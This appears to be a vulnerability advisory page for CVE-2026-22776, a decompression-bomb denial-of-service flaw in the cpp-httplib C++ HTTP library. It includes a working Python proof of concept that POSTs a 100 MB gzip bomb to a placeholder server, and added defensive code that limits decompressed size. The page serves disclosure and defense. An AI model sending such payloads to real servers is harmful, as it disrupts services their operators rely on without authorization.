Security Vulnerability Report
CVE-2026-22776 CVSS 7.5 HIGH

CVE-2026-22776

Published: 2026-01-12 19:16:04
Last Modified: 2026-01-15 22:43:10

Description

cpp-httplib is a C++11 single-file, header-only, cross-platform HTTP/HTTPS library. Prior to version 0.30.1, a Denial of Service (DoS) vulnerability exists in cpp-httplib due to the unsafe handling of compressed HTTP request bodies (Content-Encoding: gzip, br, etc.). The library validates payload_max_length against the compressed data size received from the network, but does not limit the size of the decompressed data stored in memory.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:yhirose:cpp-httplib:*:*:*:*:*:*:*:* - VULNERABLE
cpp-httplib < 0.30.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import gzip
import requests

# Build highly compressible malicious data
original_data = b'A' * (1024 * 1024 * 100)  # 100 MB of repeated data
compressed_data = gzip.compress(original_data)

print(f"Original size: {len(original_data)} bytes")
print(f"Compressed size: {len(compressed_data)} bytes")
print(f"Compression ratio: {len(original_data) / len(compressed_data):.1f}:1")

# Send the malicious request
url = "http://target-server/api/upload"
headers = {
    'Content-Encoding': 'gzip',
    'Content-Type': 'application/octet-stream',
    'Content-Length': str(len(compressed_data))
}

try:
    response = requests.post(url, data=compressed_data, headers=headers)
    print(f"Response status: {response.status_code}")
except Exception as e:
    print(f"Request failed: {e}")
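As the defender-side counterpart to the description above, here is an added example (not cpp-httplib code and not part of the advisory) of a bounded gzip decompressor that enforces payload_max_length on the decompressed size rather than on the bytes read from the wire, shown beside the compressed-size-only check the advisory describes. It uses Python's standard zlib so it runs stand-alone; the function names and the constructed BOMB/SMALL inputs are this example's own, and it covers gzip only (the advisory also names br, which zlib does not handle).

```python
import gzip
import zlib

# Constructed sample inputs: BOMB is a few-KiB gzip member that inflates to
# 4 MiB of 'A', the high-compression-ratio shape the PoC above relies on.
BOMB = gzip.compress(b"A" * (4 * 1024 * 1024))
SMALL = gzip.compress(b"hello, world")


class PayloadTooLarge(Exception):
    """Raised when the decompressed body would exceed payload_max_length."""


def vulnerable_length_check(compressed: bytes, payload_max_length: int) -> bool:
    """Pre-0.30.1 behaviour as the advisory describes it: the limit is compared
    with the bytes read from the network, i.e. the compressed size, so a small
    bomb passes even though it inflates to far more than the limit."""
    return len(compressed) <= payload_max_length


def inflate_bounded(compressed: bytes, payload_max_length: int,
                    chunk_size: int = 64 * 1024) -> bytes:
    """Inflate a gzip body while enforcing payload_max_length on the decompressed
    size. Input is fed in chunks as a server reads it from the socket, and zlib
    is asked for at most (remaining budget + 1) bytes per call, so memory stays
    bounded by payload_max_length plus one chunk whatever the ratio."""
    d = zlib.decompressobj(wbits=31)  # 31: expect a gzip container
    out = bytearray()
    for i in range(0, len(compressed), chunk_size):
        data = compressed[i:i + chunk_size]
        while data:
            # If zlib can return one byte beyond the budget, the body is too
            # large: stop here instead of inflating the rest of the stream.
            out += d.decompress(data, payload_max_length - len(out) + 1)
            if len(out) > payload_max_length:
                raise PayloadTooLarge(f"body exceeds {payload_max_length} bytes")
            data = d.unconsumed_tail  # compressed input not yet consumed
    out += d.flush()  # drains any output still pending for consumed input
    if len(out) > payload_max_length:
        raise PayloadTooLarge(f"body exceeds {payload_max_length} bytes")
    return bytes(out)


def accepts(compressed: bytes, payload_max_length: int) -> bool:
    """True if the bounded decompressor accepts the body, False if it rejects."""
    try:
        inflate_bounded(compressed, payload_max_length)
        return True
    except PayloadTooLarge:
        return False
```

With a 1 MiB payload_max_length, vulnerable_length_check(BOMB, limit) returns True while accepts(BOMB, limit) returns False; a body that inflates to exactly the limit is still accepted.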

References

https://github.com/yhirose/cpp-httplib/commit/2e2e47bab1ae6a853476eecbc4bf279dd1fef792 (Patch)
https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-h934-98h4-j43q (Exploit, Vendor Advisory)
